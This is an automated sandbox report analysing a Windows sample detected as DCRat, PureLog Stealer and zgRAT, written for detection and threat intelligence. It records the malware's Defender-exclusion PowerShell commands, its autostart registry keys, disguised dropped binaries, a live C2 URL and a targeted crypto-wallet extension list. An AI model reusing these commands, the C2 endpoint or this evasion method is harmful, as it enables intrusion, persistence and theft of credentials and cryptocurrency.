Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe

Overview

General Information

Sample name:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
Analysis ID:1584173
MD5:f9589e19d9a2ffbfacb439b029ab4f06
SHA1:0eb7246ee67d0a7289a1eb5d76a4df8f1c6a4a72
SHA256:6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746bf082418d809b9763156
Tags:exeZyklonuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
    • csc.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7604 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DC7.tmp" "c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7812 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7652 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\services.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7836 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\smartscreen.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7860 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7880 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3104 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7520 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • services.exe (PID: 5344 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • services.exe (PID: 8020 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • services.exe (PID: 8096 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 6120 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 1436 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 6720 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 7232 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 5796 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • svchost.exe (PID: 5956 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • services.exe (PID: 6020 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 3488 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • System.exe (PID: 6664 cmdline: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • services.exe (PID: 7056 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • smartscreen.exe (PID: 1144 cmdline: "C:\Program Files (x86)\windows nt\smartscreen.exe" MD5: F9589E19D9A2FFBFACB439B029AB4F06)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows NT\smartscreen.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows NT\smartscreen.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe PID: 7416JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: services.exe PID: 5344JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetFilename: C:\Program Files (x86)\windows sidebar\Gadgets\services.exe
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', ProcessId: 7812, ProcessName: powershell.exe
                            Sigma detected: System File Execution Location Anomaly
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, NewProcessName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, OriginalFileName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", ProcessId: 8020, ProcessName: services.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System
                            Sigma detected: CurrentVersion NT Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", ProcessId: 7548, ProcessName: csc.exe
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', ProcessId: 7812, ProcessName: powershell.exe
                            Sigma detected: Suspicious Powershell In Registry Run Keys
                            Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System
                            Sigma detected: Dynamic CSharp Compile Artefact
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessId: 7416, TargetFilename: C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe', ProcessId: 7812, ProcessName: powershell.exe
                            Sigma detected: Windows Processes Suspicious Parent Directory
                            Source: Process startedAuthor: vburov: Data: Command: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, NewProcessName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, OriginalFileName: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe", ProcessId: 8020, ProcessName: services.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Dot net compiler compiles file from suspicious location
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe", ParentImage: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ParentProcessId: 7416, ParentProcessName: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\od53iwxz\od53iwxz.cmdline", ProcessId: 7548, ProcessName: csc.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-01-04T14:52:18.763665+010020480951A Network Trojan was detected192.168.2.449731154.29.71.980TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\B7heSupDrt.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Found malware configuration
                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://154.29.71.9/eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeReversingLabs: Detection: 76%
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeReversingLabs: Detection: 76%
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeReversingLabs: Detection: 76%
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeReversingLabs: Detection: 76%
                            Source: C:\Users\user\Desktop\AIflJiPS.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\CeJjFnSo.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\KpOqUOcm.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\PxIPwdiO.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\SVvXiHdY.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\bZqOSDZv.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\fePfJVil.logReversingLabs: Detection: 37%
                            Source: C:\Users\user\Desktop\hFbfZzNA.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\npUmXvsj.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\qaACfJCc.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\rWndvGZf.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\rxSvtOmf.logReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\syOLALyL.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\ujtbHYJE.logReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\urdulIjK.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\zNoaAjFw.logReversingLabs: Detection: 25%
                            Source: C:\Windows\Vss\Writers\Application\TItoGxsDkTEZBWdlQNGwopi.exeReversingLabs: Detection: 76%
                            Multi AV Scanner detection for submitted file
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeVirustotal: Detection: 60%Perma Link
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeReversingLabs: Detection: 76%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeJoe Sandbox ML: detected
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeJoe Sandbox ML: detected
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\CeJjFnSo.logJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
